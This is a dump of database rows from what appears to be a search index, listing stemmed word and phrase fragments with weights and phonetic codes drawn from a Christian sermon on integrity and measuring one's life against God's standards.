(287453, 'fashion and style', 'fashion and style', 0, 1, 1.5667, 'F253234', 1, '*'),
(287454, 'father\'s instruction', 'father instruction', 0, 1, 1.6667, 'F3625236235', 1, '*'),
(287455, 'father\'s instruction no', 'father instruction no', 0, 1, 1.7667, 'F3625236235', 1, '*'),
(287456, 'few examples', 'few examples', 0, 1, 1.4, 'F25142', 1, '*'),
(287457, 'few examples of', 'few examples of', 0, 1, 1.5, 'F251421', 1, '*'),
(287458, 'fit for the', 'fit for the', 0, 1, 1.3667, 'F3163', 1, '*'),
(287459, 'flesh demands', 'flesh demands', 0, 1, 1.4333, 'F423532', 1, '*'),
(287460, 'flesh demands and', 'flesh demands and', 0, 1, 1.5667, 'F42353253', 1, '*'),
(287461, 'fleshly', 'fleshli', 0, 0, 0.4667, 'F424', 1, '*'),
(287462, 'fleshly governed', 'fleshli governed', 0, 1, 1.5333, 'F42421653', 1, '*'),
(287463, 'fleshly governed according', 'fleshli governed according', 0, 1, 1.8667, 'F4242165326352', 1, '*'),
(287464, 'flow before', 'flow before', 0, 1, 1.3667, 'F416', 1, '*'),
(287465, 'flow before god', 'flow before god', 0, 1, 1.5, 'F41623', 1, '*'),
(287466, 'for the master\'s', 'for the master', 0, 1, 1.5333, 'F6352362', 1, '*'),
(287467, 'found wanting but', 'found wanting but', 0, 1, 1.5667, 'F53535213', 1, '*'),
(287468, 'found wanting i', 'found wanting i', 0, 1, 1.5, 'F535352', 1, '*'),
(287469, 'found wanting when', 'found wanting when', 0, 1, 1.6, 'F5353525', 1, '*'),
(287470, 'from anywhere', 'from anywhere', 0, 1, 1.4333, 'F656', 1, '*'),
(287471, 'from anywhere when', 'from anywhere when', 0, 1, 1.6, 'F6565', 1, '*'),
(287472, 'gets promoted', 'get promoted', 0, 1, 1.4333, 'G321653', 1, '*'),
(287473, 'gets promoted or', 'get promoted or', 0, 1, 1.5333, 'G3216536', 1, '*'),
(287474, 'god now', 'god now', 0, 1, 1.2333, 'G350', 2, '*'),
(287475, 'god now in', 'god now in', 0, 1, 1.3333, 'G350', 1, '*'),
(287476, 'god paul', 'god paul', 0, 1, 1.2667, 'G314', 1, '*'),
(287477, 'god paul 1cor.9', 'god paul 1cor.9', 0, 1, 1.5, 'G31426', 1, '*'),
(287478, 'god weighs a', 'god weighs a', 0, 1, 1.4, 'G320', 1, '*'),
(287479, 'god\'s example', 'god example', 0, 1, 1.4333, 'G32514', 1, '*'),
(287480, 'god\'s example of', 'god example of', 0, 1, 1.5333, 'G325141', 1, '*'),
(287481, 'god\'s standards', 'god standards', 0, 1, 1.5, 'G32353632', 1, '*'),
(287482, 'god\'s value', 'god value', 0, 1, 1.3667, 'G3214', 1, '*'),
(287483, 'god\'s value system', 'god value system', 0, 1, 1.6, 'G3214235', 1, '*'),
(287484, 'god\'s word your', 'god word your', 0, 1, 1.5, 'G32636', 1, '*'),
(287485, 'governed', 'govern', 0, 0, 0.5333, 'G1653', 1, '*'),
(287486, 'governed according', 'govern according', 0, 1, 1.6, 'G165326352', 1, '*'),
(287487, 'governed according to', 'govern according to', 0, 1, 1.7, 'G1653263523', 1, '*'),
(287488, 'have looked', 'have looked', 0, 1, 1.3667, 'H1423', 1, '*'),
(287489, 'have looked at', 'have looked at', 0, 1, 1.4667, 'H1423', 1, '*'),
(287490, 'he could talk', 'he could talk', 0, 1, 1.4333, 'H24342', 1, '*'),
(287491, 'he either', 'he either', 0, 1, 1.3, 'H360', 1, '*'),
(287492, 'he either passes', 'he either passes', 0, 1, 1.5333, 'H3612', 1, '*'),
(287493, 'he is found', 'he is found', 0, 1, 1.3667, 'H2153', 1, '*'),
(287494, 'he is set', 'he is set', 0, 1, 1.3, 'H230', 1, '*'),
(287495, 'he was christ', 'he was christ', 0, 1, 1.4333, 'H2623', 1, '*'),
(287496, 'his integrity', 'hi integrity', 0, 1, 1.4333, 'H253263', 1, '*'),
(287497, 'his integrity before', 'hi integrity before', 0, 1, 1.6667, 'H25326316', 1, '*'),
(287498, 'his life before', 'hi life before', 0, 1, 1.5, 'H2416', 1, '*'),
(287499, 'his life it', 'hi life it', 0, 1, 1.3667, 'H2413', 1, '*'),
(287500, 'human examples', 'human examples', 0, 1, 1.4667, 'H525142', 1, '*'),
(287501, 'human examples some', 'human examples some', 0, 1, 1.6333, 'H5251425', 1, '*'),
(287502, 'i e weighs', 'i e weighs', 0, 1, 1.3333, 'I200', 1, '*'),
(287503, 'if you bring', 'if you bring', 0, 1, 1.4, 'I1652', 1, '*'),
(287504, 'if you move', 'if you move', 0, 1, 1.3667, 'I151', 1, '*'),
(287505, 'in a blameless', 'in a blameless', 0, 1, 1.4667, 'I514542', 1, '*'),
(287506, 'in eternity make', 'in eternity make', 0, 1, 1.5333, 'I5365352', 1, '*'),
(287507, 'in mind', 'in mind', 0, 1, 1.2333, 'I530', 1, '*'),
(287508, 'in mind that', 'in mind that', 0, 1, 1.4, 'I530', 1, '*'),
(287509, 'in time', 'in time', 0, 1, 1.2333, 'I535', 1, '*'),
(287510, 'in time or', 'in time or', 0, 1, 1.3333, 'I5356', 1, '*'),
(287511, 'inspired', 'inspir', 0, 0, 0.5333, 'I52163', 1, '*'),
(287512, 'inspired or', 'inspir or', 0, 1, 1.3667, 'I521636', 1, '*'),
(287513, 'inspired or fleshly', 'inspir or fleshly', 0, 1, 1.6333, 'I5216361424', 1, '*'),
(287514, 'instruction no', 'instruct no', 0, 1, 1.4667, 'I5236235', 1, '*'),
(287515, 'instruction no matter', 'instruct no matter', 0, 1, 1.7, 'I523623536', 1, '*'),
(287516, 'integrity before', 'integr before', 0, 1, 1.5333, 'I5326316', 1, '*'),
(287517, 'integrity before the', 'integr before the', 0, 1, 1.6667, 'I53263163', 1, '*'),
(287518, 'integrity jesus', 'integr jesus', 0, 1, 1.5, 'I532632', 1, '*'),
(287519, 'integrity jesus matt.16', 'integr jesus matt.16', 0, 1, 1.7667, 'I53263253', 1, '*'),
(287520, 'introduction always', 'introduct always', 0, 1, 1.6333, 'I536323542', 1, '*'),
(287521, 'introduction always put', 'introduct always put', 0, 1, 1.7667, 'I53632354213', 1, '*'),
(287522, 'is 1', 'is 1', 0, 1, 1.1333, 'I200', 1, '*'),
(287523, 'is 1 15-17', 'is 1 15-17', 0, 1, 1.3333, 'I200', 1, '*'),
(287524, 'is found wanting', 'is found wanting', 0, 1, 1.5333, 'I21535352', 1, '*'),
(287525, 'is set', 'is set', 0, 1, 1.2, 'I230', 1, '*'),
(287526, 'is set side', 'is set side', 0, 1, 1.3667, 'I2323', 1, '*'),
(287527, 'israel and', 'israel and', 0, 1, 1.3333, 'I26453', 1, '*'),
(287528, 'israel and they', 'israel and they', 0, 1, 1.5, 'I26453', 1, '*'),
(287529, 'it in mind', 'it in mind', 0, 1, 1.3333, 'I353', 1, '*'),
(287530, 'item 40', 'item 40', 0, 1, 1.2333, 'I350', 1, '*'),
(287531, 'item 40 examples', 'item 40 examples', 0, 1, 1.5333, 'I3525142', 1, '*'),
(287532, 'jer.35', 'jer.35', 0, 0, 0.4, 'J600', 1, '*'),
(287533, 'jer.35 1-12', 'jer.35 1-12', 0, 1, 1.3667, 'J600', 1, '*'),
(287534, 'jer.35 1-12 they', 'jer.35 1-12 they', 0, 1, 1.5333, 'J630', 1, '*'),
(287535, 'jesus matt.16', 'jesu matt.16', 0, 1, 1.4333, 'J530', 1, '*'),
(287536, 'jesus matt.16 13-16', 'jesu matt.16 13-16', 0, 1, 1.6333, 'J530', 1, '*'),
(287537, 'judge yourself you\'ll', 'judg yourself you', 0, 1, 1.7, 'J3262414', 1, '*'),
(287538, 'judged 1cor.11', 'judg 1cor.11', 0, 1, 1.4667, 'J32326', 1, '*'),
(287539, 'judged 1cor.11 30', 'judg 1cor.11 30', 0, 1, 1.5667, 'J32326', 1, '*'),
(287540, 'justice', 'justic', 0, 0, 0.4667, 'J320', 1, '*'),
(287541, 'justice right', 'justic right', 0, 1, 1.4333, 'J32623', 1, '*'),
(287542, 'justice right conscience', 'justic right conscience', 0, 1, 1.8, 'J3262325252', 1, '*'),
(287543, 'k2 item 40', 'k2 item 40', 0, 1, 1.3333, 'K350', 1, '*'),
(287544, 'kingdom of god\'s', 'kingdom of god', 0, 1, 1.5333, 'K52351232', 1, '*'),
(287545, 'labouring', 'labour', 0, 0, 0.6, 'L1652', 2, '*'),
(287546, 'labouring with', 'labour with', 0, 1, 1.4667, 'L16523', 1, '*'),
(287547, 'labouring with no', 'labour with no', 0, 1, 1.5667, 'L165235', 1, '*'),
(287548, 'less than', 'less than', 0, 1, 1.3, 'L235', 1, '*'),
(287549, 'less than expected', 'less than expected', 0, 1, 1.6, 'L2352123', 1, '*'),
(287550, 'let\'s see', 'let see', 0, 1, 1.3, 'L320', 1, '*'),
(287551, 'let\'s see few', 'let see few', 0, 1, 1.4333, 'L321', 1, '*'),
(287552, 'life and ministry', 'life and ministry', 0, 1, 1.5667, 'L1535236', 1, '*'),
(287553, 'life before them', 'life before them', 0, 1, 1.5333, 'L1635', 1, '*'),
(287554, 'life it was', 'life it was', 0, 1, 1.3667, 'L132', 1, '*'),
(287555, 'life you\'ll', 'life you', 0, 1, 1.3667, 'L140', 1, '*'),
(287556, 'life you\'ll never', 'life you never', 0, 1, 1.5667, 'L14516', 1, '*'),
(287557, 'live to', 'live to', 0, 1, 1.2333, 'L130', 1, '*'),
(287558, 'live to violate', 'live to violate', 0, 1, 1.5, 'L13143', 1, '*'),
(287559, 'lived', 'live', 0, 0, 0.3333, 'L130', 1, '*'),
(287560, 'lived their', 'live their', 0, 1, 1.3667, 'L136', 1, '*'),
(287561, 'lived their lives', 'live their lives', 0, 1, 1.5667, 'L136412', 1, '*'),
(287562, 'lives weighing', 'live weighing', 0, 1, 1.4667, 'L1252', 1, '*'),
(287563, 'lives weighing themselves', 'live weighing themselves', 0, 1, 1.8333, 'L1252352412', 1, '*'),
(287564, 'looked at lived', 'look at lived', 0, 1, 1.5, 'L23413', 1, '*'),
(287565, 'lord\'s', 'lord', 0, 0, 0.4, 'L632', 2, '*'),
(287566, 'lord\'s standard', 'lord standard', 0, 1, 1.5, 'L63235363', 1, '*'),
(287567, 'lord\'s standard so', 'lord standard so', 0, 1, 1.6, 'L632353632', 1, '*'),
(287568, 'make a man', 'make a man', 0, 1, 1.3333, 'M250', 2, '*'),
(287569, 'make god\'s', 'make god', 0, 1, 1.3333, 'M232', 1, '*'),
(287570, 'make god\'s word', 'make god word', 0, 1, 1.5, 'M23263', 1, '*'),
(287571, 'man acceptable', 'man acceptable', 0, 1, 1.4667, 'M21314', 1, '*'),
(287572, 'man acceptable etc', 'man acceptable etc', 0, 1, 1.6, 'M2131432', 1, '*'),
(287573, 'man he either', 'man he either', 0, 1, 1.4333, 'M360', 1, '*'),
(287574, 'man of integrity', 'man of integrity', 0, 1, 1.5333, 'M153263', 1, '*'),
(287575, 'manner carefully', 'manner carefully', 0, 1, 1.5333, 'M62614', 1, '*'),
(287576, 'manner carefully labouring', 'manner carefully labouring', 0, 1, 1.8667, 'M626141652', 1, '*'),
(287577, 'master\'s use', 'master use', 0, 1, 1.4, 'M2362', 1, '*'),
(287578, 'master\'s use the', 'master use the', 0, 1, 1.5333, 'M23623', 1, '*'),
(287579, 'matt.16', 'matt.16', 0, 0, 0.4667, 'M300', 1, '*'),
(287580, 'matt.16 13-16', 'matt.16 13-16', 0, 1, 1.4333, 'M300', 1, '*'),
(287581, 'matt.16 13-16 by', 'matt.16 13-16 by', 0, 1, 1.5333, 'M310', 1, '*'),
(287582, 'matter the pressure', 'matter the pressure', 0, 1, 1.6333, 'M3631626', 1, '*'),
(287583, 'mean justice', 'mean justice', 0, 1, 1.4, 'M232', 1, '*'),
(287584, 'mean justice right', 'mean justice right', 0, 1, 1.6, 'M232623', 1, '*'),
(287585, 'measure up', 'measur up', 0, 1, 1.3333, 'M261', 1, '*'),
(287586, 'measure up they', 'measur up they', 0, 1, 1.5, 'M2613', 1, '*'),
(287587, 'measure your', 'measur your', 0, 1, 1.4, 'M260', 1, '*'),
(287588, 'measure your life', 'measur your life', 0, 1, 1.5667, 'M2641', 1, '*'),
(287589, 'measured', 'measur', 0, 0, 0.5333, 'M263', 2, '*'),
(287590, 'measured up', 'measur up', 0, 1, 1.3667, 'M2631', 1, '*'),
(287591, 'measured up according', 'measur up according', 0, 1, 1.7, 'M263126352', 1, '*'),
(287592, 'mind that', 'mind that', 0, 1, 1.3, 'M300', 1, '*'),
(287593, 'mind that the', 'mind that the', 0, 1, 1.4333, 'M300', 1, '*'),
(287594, 'ministry everything', 'ministri everything', 0, 1, 1.6333, 'M23616352', 1, '*'),
(287595, 'ministry everything done', 'ministri everything done', 0, 1, 1.8, 'M2361635235', 1, '*'),
(287596, 'move with worldly', 'move with worldly', 0, 1, 1.5667, 'M136434', 1, '*'),
(287597, 'nation of', 'nation of', 0, 1, 1.3, 'N351', 1, '*'),
(287598, 'nation of israel', 'nation of israel', 0, 1, 1.5333, 'N351264', 1, '*'),
(287599, 'never be found', 'never be found', 0, 1, 1.4667, 'N16153', 1, '*'),
(287600, 'no compromise', 'no compromise', 0, 1, 1.4333, 'N251652', 1, '*'),
(287601, 'no compromise whatsoever', 'no compromise whatsoever', 0, 1, 1.8, 'N2516523216', 1, '*'),
(287602, 'nor choose', 'nor choose', 0, 1, 1.3333, 'N620', 1, '*'),
(287603, 'nor choose the', 'nor choose the', 0, 1, 1.4667, 'N623', 1, '*'),
(287604, 'not be judged', 'not be judged', 0, 1, 1.4333, 'N312323', 1, '*'),
(287605, 'not difficult', 'not difficult', 0, 1, 1.4333, 'N31243', 1, '*'),
(287606, 'not difficult to', 'not difficult to', 0, 1, 1.5333, 'N31243', 1, '*'),
(287607, 'not fit', 'not fit', 0, 1, 1.2333, 'N313', 1, '*'),
(287608, 'not fit for', 'not fit for', 0, 1, 1.3667, 'N31316', 1, '*'),
(287609, 'now in time', 'now in time', 0, 1, 1.3667, 'N350', 1, '*'),
(287610, 'obedient to', 'obedi to', 0, 1, 1.3667, 'O1353', 1, '*'),
(287611, 'obedient to their', 'obedi to their', 0, 1, 1.5667, 'O13536', 1, '*'),
(287612, 'of a people', 'of a people', 0, 1, 1.3667, 'O140', 1, '*'),
(287613, 'of god\'s value', 'of god value', 0, 1, 1.4667, 'O123214', 1, '*'),
(287614, 'of his integrity', 'of his integrity', 0, 1, 1.5333, 'O1253263', 1, '*'),
(287615, 'of his life', 'of his life', 0, 1, 1.3667, 'O1241', 1, '*'),
(287616, 'of integrity', 'of integrity', 0, 1, 1.4, 'O153263', 1, '*'),
(287617, 'of integrity jesus', 'of integrity jesus', 0, 1, 1.6, 'O1532632', 1, '*'),
(287618, 'of israel and', 'of israel and', 0, 1, 1.4333, 'O126453', 1, '*'),
(287619, 'of people that', 'of people that', 0, 1, 1.4667, 'O143', 2, '*'),
(287620, 'of weights and', 'of weights and', 0, 1, 1.4667, 'O123253', 1, '*'),
(287621, 'of which', 'of which', 0, 1, 1.2667, 'O120', 1, '*'),
(287622, 'of which are', 'of which are', 0, 1, 1.4, 'O126', 1, '*'),
(287623, 'opened them', 'open them', 0, 1, 1.3667, 'O1535', 1, '*'),
(287624, 'opened them up', 'open them up', 0, 1, 1.4667, 'O15351', 1, '*'),
(287625, 'or fleshly', 'or fleshly', 0, 1, 1.3333, 'O61424', 1, '*'),
(287626, 'or fleshly governed', 'or fleshly governed', 0, 1, 1.6333, 'O6142421653', 1, '*'),
(287627, 'or gets', 'or gets', 0, 1, 1.2333, 'O6232', 1, '*'),
(287628, 'or gets promoted', 'or gets promoted', 0, 1, 1.5333, 'O62321653', 1, '*'),
(287629, 'or he', 'or he', 0, 1, 1.1667, 'O600', 1, '*'),
(287630, 'or he is', 'or he is', 0, 1, 1.2667, 'O620', 1, '*'),
(287631, 'or in eternity', 'or in eternity', 0, 1, 1.4667, 'O653653', 1, '*'),
(287632, 'passes', 'pass', 0, 0, 0.4, 'P200', 1, '*'),
(287633, 'passes or', 'pass or', 0, 1, 1.3, 'P260', 1, '*'),
(287634, 'passes or gets', 'pass or gets', 0, 1, 1.4667, 'P26232', 1, '*'),
(287635, 'paul 1cor.9', 'paul 1cor.9', 0, 1, 1.3667, 'P426', 1, '*'),
(287636, 'paul 1cor.9 1-27', 'paul 1cor.9 1-27', 0, 1, 1.5333, 'P426', 1, '*'),
(287637, 'people that put', 'peopl that put', 0, 1, 1.5, 'P4313', 1, '*'),
(287638, 'people we', 'peopl we', 0, 1, 1.3, 'P400', 1, '*'),
(287639, 'people we have', 'peopl we have', 0, 1, 1.4667, 'P410', 1, '*'),
(287640, 'pleasure of the', 'pleasur of the', 0, 1, 1.5, 'P42613', 1, '*'),
(287641, 'pressure from', 'pressur from', 0, 1, 1.4333, 'P626165', 1, '*'),
(287642, 'pressure from anywhere', 'pressur from anywhere', 0, 1, 1.7333, 'P6261656', 1, '*'),
(287643, 'promoted', 'promot', 0, 0, 0.5333, 'P653', 1, '*'),
(287644, 'promoted or', 'promot or', 0, 1, 1.3667, 'P6536', 1, '*'),
(287645, 'promoted or he', 'promot or he', 0, 1, 1.4667, 'P6536', 1, '*'),
(287646, 'prov.6', 'prov.6', 0, 0, 0.4, 'P610', 1, '*'),
(287647, 'prov.6 2', 'prov.6 2', 0, 1, 1.2667, 'P610', 1, '*'),
(287648, 'prov.6 2 is', 'prov.6 2 is', 0, 1, 1.3667, 'P612', 1, '*'),
(287649, 'put it', 'put it', 0, 1, 1.2, 'P300', 2, '*'),
(287650, 'put it in', 'put it in', 0, 1, 1.3, 'P350', 2, '*'),
(287651, 'put themselves', 'put themselves', 0, 1, 1.4667, 'P352412', 1, '*'),
(287652, 'put themselves on', 'put themselves on', 0, 1, 1.5667, 'P3524125', 1, '*'),
(287653, 'qualities', 'qualiti', 0, 0, 0.6, 'Q432', 1, '*'),
(287654, 'qualities that', 'qualiti that', 0, 1, 1.4667, 'Q4323', 1, '*'),
(287655, 'qualities that make', 'qualiti that make', 0, 1, 1.6333, 'Q432352', 1, '*'),
(287656, 'rechabites', 'rechabit', 0, 0, 0.6667, 'R2132', 1, '*'),
(287657, 'rechabites jer.35', 'rechabit jer.35', 0, 1, 1.5667, 'R21326', 1, '*'),
(287658, 'rechabites jer.35 1-12', 'rechabit jer.35 1-12', 0, 1, 1.7333, 'R21326', 1, '*'),
(287659, 'right conscience', 'right conscience', 0, 1, 1.5333, 'R2325252', 1, '*'),
(287660, 'right conscience correct', 'right conscience correct', 0, 1, 1.8, 'R2325252623', 1, '*'),
(287661, 'right flow', 'right flow', 0, 1, 1.3333, 'R2314', 1, '*'),
(287662, 'right flow before', 'right flow before', 0, 1, 1.5667, 'R231416', 1, '*'),
(287663, 'rom.6', 'rom.6', 0, 0, 0.3333, 'R500', 1, '*'),
(287664, 'rom.6 12', 'rom.6 12', 0, 1, 1.2667, 'R500', 1, '*'),
(287665, 'rom.6 12 1sam', 'rom.6 12 1sam', 0, 1, 1.4333, 'R525', 1, '*'),
(287666, 'rule and', 'rule and', 0, 1, 1.2667, 'R453', 1, '*'),
(287667, 'rule and it', 'rule and it', 0, 1, 1.3667, 'R453', 1, '*'),
(287668, 'samuel 1sam.12', 'samuel 1sam.12', 0, 1, 1.4667, 'S5425', 1, '*'),
(287669, 'samuel 1sam.12 3-5', 'samuel 1sam.12 3-5', 0, 1, 1.6, 'S5425', 1, '*'),
(287670, 'samuel could', 'samuel could', 0, 1, 1.4, 'S54243', 1, '*'),
(287671, 'samuel could confidently', 'samuel could confidently', 0, 1, 1.8, 'S542432513534', 1, '*'),
(287672, 'satanically', 'satan', 0, 0, 0.7333, 'S3524', 1, '*'),
(287673, 'satanically inspired', 'satan inspired', 0, 1, 1.6667, 'S352452163', 1, '*'),
(287674, 'satanically inspired or', 'satan inspired or', 0, 1, 1.7667, 'S3524521636', 1, '*'),
(287675, 'saw his', 'saw his', 0, 1, 1.2333, 'S000', 1, '*'),
(287676, 'saw his life', 'saw his life', 0, 1, 1.4, 'S410', 1, '*'),
(287677, 'scale and', 'scale and', 0, 1, 1.3, 'S453', 1, '*'),
(287678, 'scale and measured', 'scale and measured', 0, 1, 1.6, 'S4535263', 1, '*'),
(287679, 'scale your', 'scale your', 0, 1, 1.3333, 'S460', 1, '*'),
(287680, 'scale your standard', 'scale your standard', 0, 1, 1.6333, 'S46235363', 1, '*'),
(287681, 'scales and', 'scale and', 0, 1, 1.3333, 'S4253', 1, '*'),
(287682, 'scales and balances', 'scale and balances', 0, 1, 1.6333, 'S42531452', 1, '*'),
(287683, 'see few', 'see few', 0, 1, 1.2333, 'S100', 1, '*'),
(287684, 'see few examples', 'see few examples', 0, 1, 1.5333, 'S125142', 1, '*'),
(287685, 'set side', 'set side', 0, 1, 1.2667, 'S323', 1, '*'),
(287686, 'set side not', 'set side not', 0, 1, 1.4, 'S32353', 1, '*'),
(287687, 'side not', 'side not', 0, 1, 1.2667, 'S353', 1, '*'),
(287688, 'side not fit', 'side not fit', 0, 1, 1.4, 'S35313', 1, '*'),
(287689, 'so they could', 'so they could', 0, 1, 1.4333, 'S3243', 1, '*'),
(287690, 'some of which', 'some of which', 0, 1, 1.4333, 'S512', 1, '*'),
(287691, 'spirit to be', 'spirit to be', 0, 1, 1.4, 'S1631', 1, '*'),
(287692, 'stand before god', 'stand before god', 0, 1, 1.5333, 'S3531623', 1, '*'),
(287693, 'standard and', 'standard and', 0, 1, 1.4, 'S3536353', 2, '*'),
(287694, 'standard and your', 'standard and your', 0, 1, 1.5667, 'S35363536', 1, '*'),
(287695, 'standard being', 'standard being', 0, 1, 1.4667, 'S35363152', 1, '*'),
(287696, 'standard being straight', 'standard being straight', 0, 1, 1.7667, 'S353631523623', 1, '*'),
(287697, 'standard so', 'standard so', 0, 1, 1.3667, 'S353632', 2, '*'),
(287698, 'standard so they', 'standard so they', 0, 1, 1.5333, 'S3536323', 1, '*'),
(287699, 'standard with', 'standard with', 0, 1, 1.4333, 'S35363', 1, '*'),
(287700, 'standard with which', 'standard with which', 0, 1, 1.6333, 'S353632', 1, '*'),
(287701, 'straight qualities', 'straight qualities', 0, 1, 1.6, 'S36232432', 1, '*'),
(287702, 'straight qualities that', 'straight qualities that', 0, 1, 1.7667, 'S362324323', 1, '*'),
(287703, 'style the flesh', 'style the flesh', 0, 1, 1.5, 'S343142', 1, '*'),
(287704, 'system if', 'system if', 0, 1, 1.3, 'S351', 1, '*'),
(287705, 'system if you', 'system if you', 0, 1, 1.4333, 'S351', 1, '*'),
(287706, 'talk of', 'talk of', 0, 1, 1.2333, 'T421', 1, '*'),
(287707, 'talk of his', 'talk of his', 0, 1, 1.3667, 'T4212', 1, '*'),
(287708, 'terms weight', 'term weight', 0, 1, 1.4, 'T6523', 1, '*'),
(287709, 'terms weight scales', 'term weight scales', 0, 1, 1.6333, 'T6523242', 1, '*'),
(287710, 'testified that', 'testifi that', 0, 1, 1.4667, 'T2313', 1, '*'),
(287711, 'testified that he', 'testifi that he', 0, 1, 1.5667, 'T2313', 1, '*'),
(287712, 'texts 2', 'text 2', 0, 1, 1.2333, 'T232', 1, '*'),
(287713, 'texts 2 cor', 'text 2 cor', 0, 1, 1.3667, 'T2326', 1, '*'),
(287714, 'than expected', 'than expected', 0, 1, 1.4333, 'T52123', 1, '*'),
(287715, 'than expected and', 'than expected and', 0, 1, 1.5667, 'T5212353', 1, '*'),
(287716, 'that make a', 'that make a', 0, 1, 1.3667, 'T520', 2, '*'),
(287717, 'that put', 'that put', 0, 1, 1.2667, 'T130', 1, '*'),
(287718, 'that put themselves', 'that put themselves', 0, 1, 1.6333, 'T1352412', 1, '*'),
(287719, 'that the terms', 'that the terms', 0, 1, 1.4667, 'T652', 1, '*'),
(287720, 'the flesh demands', 'the flesh demands', 0, 1, 1.5667, 'T1423532', 1, '*'),
(287721, 'the lord\'s', 'the lord', 0, 1, 1.3333, 'T4632', 2, '*'),
(287722, 'the lord\'s standard', 'the lord standard', 0, 1, 1.6333, 'T463235363', 1, '*'),
(287723, 'the master\'s use', 'the master use', 0, 1, 1.5333, 'T52362', 1, '*'),
(287724, 'the nation', 'the nation', 0, 1, 1.3333, 'T535', 1, '*'),
(287725, 'the nation of', 'the nation of', 0, 1, 1.4333, 'T5351', 1, '*'),
(287726, 'the people we', 'the people we', 0, 1, 1.4333, 'T140', 1, '*'),
(287727, 'the pressure', 'the pressure', 0, 1, 1.4, 'T1626', 1, '*'),
(287728, 'the pressure from', 'the pressure from', 0, 1, 1.5667, 'T1626165', 1, '*'),
(287729, 'the right flow', 'the right flow', 0, 1, 1.4667, 'T62314', 1, '*'),
(287730, 'the scale and', 'the scale and', 0, 1, 1.4333, 'T2453', 1, '*'),
(287731, 'the standard', 'the standard', 0, 1, 1.4, 'T235363', 2, '*'),
(287732, 'the standard with', 'the standard with', 0, 1, 1.5667, 'T235363', 1, '*'),
(287733, 'the terms', 'the terms', 0, 1, 1.3, 'T652', 1, '*'),
(287734, 'the terms weight', 'the terms weight', 0, 1, 1.5333, 'T6523', 1, '*'),
(287735, 'the world above', 'the world above', 0, 1, 1.5, 'T6431', 1, '*'),
(287736, 'their conscience', 'their conscience', 0, 1, 1.5333, 'T625252', 1, '*'),
(287737, 'their conscience nor', 'their conscience nor', 0, 1, 1.6667, 'T62525256', 1, '*'),
(287738, 'their father\'s', 'their father', 0, 1, 1.4667, 'T61362', 1, '*'),
(287739, 'their father\'s instruction', 'their father instruction', 0, 1, 1.8667, 'T613625236235', 1, '*'),
(287740, 'their lives weighing', 'their lives weighing', 0, 1, 1.6667, 'T641252', 1, '*'),
(287741, 'them opened', 'them opened', 0, 1, 1.3667, 'T5153', 1, '*'),
(287742, 'them opened them', 'them opened them', 0, 1, 1.5333, 'T51535', 1, '*'),
(287743, 'them up', 'them up', 0, 1, 1.2333, 'T510', 1, '*'),
(287744, 'them up to', 'them up to', 0, 1, 1.3333, 'T513', 1, '*'),
(287745, 'themselves already', 'themselv already', 0, 1, 1.6, 'T52412463', 1, '*'),
(287746, 'themselves already by', 'themselv already by', 0, 1, 1.7, 'T524124631', 1, '*'),
(287747, 'then you\'ll', 'then you', 0, 1, 1.3667, 'T540', 1, '*'),
(287748, 'then you\'ll be', 'then you be', 0, 1, 1.4667, 'T541', 1, '*'),
(287749, 'they all testified', 'thei all testified', 0, 1, 1.6, 'T432313', 1, '*'),
(287750, 'they became', 'thei became', 0, 1, 1.3667, 'T125', 1, '*'),
(287751, 'they became god\'s', 'thei became god', 0, 1, 1.5667, 'T125232', 1, '*'),
(287752, 'they could', 'thei could', 0, 1, 1.3333, 'T243', 1, '*'),
(287753, 'they could measure', 'thei could measure', 0, 1, 1.6, 'T243526', 1, '*'),
(287754, 'they didn\'t live', 'thei didn live', 0, 1, 1.5333, 'T5341', 1, '*'),
(287755, 'they saw', 'thei saw', 0, 1, 1.2667, 'T200', 1, '*'),
(287756, 'they saw his', 'thei saw his', 0, 1, 1.4, 'T200', 1, '*'),
(287757, 'time or', 'time or', 0, 1, 1.2333, 'T560', 1, '*'),
(287758, 'time or in', 'time or in', 0, 1, 1.3333, 'T565', 1, '*'),
(287759, 'to be the', 'to be the', 0, 1, 1.3, 'T130', 1, '*'),
(287760, 'to conclude', 'to conclude', 0, 1, 1.3667, 'T25243', 1, '*'),
(287761, 'to conclude that', 'to conclude that', 0, 1, 1.5333, 'T25243', 1, '*'),
(287762, 'to eph.2', 'to eph.2', 0, 1, 1.2667, 'T100', 1, '*'),
(287763, 'to eph.2 1-2', 'to eph.2 1-2', 0, 1, 1.4, 'T100', 1, '*'),
(287764, 'to god\'s standards', 'to god standards', 0, 1, 1.6, 'T232353632', 1, '*'),
(287765, 'to their father\'s', 'to their father', 0, 1, 1.5667, 'T61362', 1, '*'),
(287766, 'to violate', 'to violate', 0, 1, 1.3333, 'T143', 1, '*'),
(287767, 'to violate their', 'to violate their', 0, 1, 1.5333, 'T1436', 1, '*'),
(287768, 'true man', 'true man', 0, 1, 1.2667, 'T650', 1, '*'),
(287769, 'true man of', 'true man of', 0, 1, 1.3667, 'T651', 1, '*'),
(287770, 'up according', 'up according', 0, 1, 1.4, 'U126352', 1, '*'),
(287771, 'up according to', 'up according to', 0, 1, 1.5, 'U1263523', 1, '*'),
(287772, 'up they', 'up they', 0, 1, 1.2333, 'U130', 1, '*'),
(287773, 'up they didn\'t', 'up they didn', 0, 1, 1.4667, 'U1353', 1, '*'),
(287774, 'use the people', 'us the people', 0, 1, 1.4667, 'U2314', 1, '*'),
(287775, 'value system', 'valu system', 0, 1, 1.4, 'V4235', 1, '*'),
(287776, 'value system if', 'valu system if', 0, 1, 1.5, 'V42351', 1, '*'),
(287777, 'violate', 'violat', 0, 0, 0.4667, 'V430', 1, '*'),
(287778, 'violate their', 'violat their', 0, 1, 1.4333, 'V436', 1, '*'),
(287779, 'violate their conscience', 'violat their conscience', 0, 1, 1.8, 'V43625252', 1, '*'),
(287780, 'wanting but', 'want but', 0, 1, 1.3667, 'W535213', 1, '*'),
(287781, 'wanting but if', 'want but if', 0, 1, 1.4667, 'W5352131', 1, '*'),
(287782, 'wanting i', 'want i', 0, 1, 1.3, 'W5352', 1, '*'),
(287783, 'wanting i e', 'want i e', 0, 1, 1.3667, 'W5352', 1, '*'),
(287784, 'wanting when', 'want when', 0, 1, 1.4, 'W53525', 1, '*'),
(287785, 'wanting when you', 'want when you', 0, 1, 1.5333, 'W53525', 1, '*'),
(287786, 'was a true', 'wa a true', 0, 1, 1.3333, 'W236', 1, '*'),
(287787, 'was christ', 'wa christ', 0, 1, 1.3333, 'W2623', 1, '*'),
(287788, 'was christ his', 'wa christ his', 0, 1, 1.4667, 'W26232', 1, '*'),
(287789, 'was not difficult', 'wa not difficult', 0, 1, 1.5667, 'W2531243', 1, '*'),
